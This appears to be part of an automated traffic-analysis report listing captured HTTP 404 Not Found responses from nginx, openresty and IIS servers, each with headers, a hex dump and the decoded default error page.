Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:50:30 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.21.4.3Date: Mon, 11 Nov 2024 17:50:36 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.21.4.3Date: Mon, 11 Nov 2024 17:50:36 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:50:39 GMTContent-Type: text/htmlContent-Length: 138Connection: keep-aliveETag: "663ee226-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:50:40 GMTContent-Type: text/htmlContent-Length: 138Connection: keep-aliveETag: "663ee226-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 11 Nov 2024 17:50:48 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:50:48 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 11 Nov 2024 17:50:48 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Mon, 11 Nov 2024 17:50:43 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:50:48 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
